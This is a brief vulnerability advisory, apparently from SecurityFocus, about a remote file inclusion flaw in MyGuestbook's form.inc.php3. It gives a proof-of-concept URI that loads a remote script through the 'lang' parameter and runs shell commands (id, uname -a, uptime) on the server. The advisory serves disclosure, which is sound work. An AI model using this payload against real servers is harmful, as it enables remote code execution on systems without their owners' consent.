MyGuestbook Form.Inc.PHP3 Remote File Include Vulnerability

No exploit is required.

The following proof of concept URI is available:
http://www.example.com/gb/form.inc.php3?lang=http://www.example.com/cmd.gif?&cmd=id;uname%20-a;uptime


 

Privacy Statement
Copyright 2010, SecurityFocus